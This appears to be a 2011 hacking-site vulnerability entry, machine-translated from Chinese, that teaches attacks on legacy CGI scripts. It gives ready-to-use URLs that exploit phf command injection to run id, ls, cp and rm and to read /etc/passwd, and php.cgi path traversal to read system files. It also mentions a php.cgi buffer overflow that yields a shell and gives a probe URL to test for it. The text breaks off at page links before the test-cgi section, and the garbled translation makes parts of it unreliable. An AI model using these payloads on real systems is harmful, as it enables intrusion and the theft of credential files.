About CGI exploits-vulnerability warning-the black bar safety net

2011-06-20T00:00:00
ID MYHACK58:62201130955
Type myhack58
Reporter 佚名
Modified 2011-06-20T00:00:00

Description

CGI vulnerability has always been easy to be people ignore the problem, but also is widespread, and shortly before the break PCWEEK LINUX hack is to use the CGI a vulnerability. I myself know of and from a foreign site, it seems that some of the CGI vulnerabilities to write some use of CGI in the attack method.

A phf. cgi attack:

phf is familiar to everyone, it was meant to be used to update the PHONEBOOK, but many of the admins of it don't understand that contrast

Became vulnerability. In the browser input:

http://thegnome.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

You can display the PASSWD document. In fact, you can also use a better command to achieve the purpose:

http://thegnome.com/cgi-bin/phf?%0aid&a Qalias=&Qname=haqr&Qemail=&Qnickna

me=&Qoffice_phone=

http://thegnome.com/cgi-bin/phf?%0als%20-la%20%7Esomeuser&a Qalias=&Qname=

haqr&Qemail=&Qnickname=&Qoffice_phone=

http://thegnome.com/cgi-bin/phf?%0acp%20/etc/passwd%20%7Esomeuser/passwd

%0A&a Qalias=&Qname=haqr&Qemail=&Qnickname=&Qoffice_phone=

http://thegnome.com/~someuser/passwd

http://thegnome.com/cgi-bin/phf?%0arm%20%7Esomeuser/passwd&a Qalias=&Qname

=haqr&Qemail=&Qnickname=&Qoffice_phone=

More than equal to the execution of the command:

id

ls-la ~someuser

cp /etc/passwd ~someuser/passwd

(With an ordinary can into the directory run the passwd)

rm ~someuser/passwd

Second, the php. cgi

In addition to the PHF outside, php also is a Common Vulnerability, php. cgi 2. 0beta10 or earlier versions, allows anyone to HTTP tube

Management Membership, reading system files, in the browser input:

http://boogered.system.com/cgi-bin/php.cgi?/etc/passwd

You can see want to see the file.

In addition, the part of php. cgi you can also execute a shell, because it put 8k bytes bytes into 128bytes buffer,

Cause stack segment overflow, so that the attacker can be in the HTTP administrator executed.

But only with PHP as CGI script can be achieved, and in as the Apache modulus is not running. Want to check whether the run

As long as in the browser input:

http://hostname/cgi-bin/php.cgi

If you see returns such words can run:

PHP/FI Version 2. 0b10

...

Third, the test-cgi problem

the test-cgi is also a often emerging vulnerabilities, in the browser input:

[1] [2] [3] [4] [5] [6] [7] [8] [9] next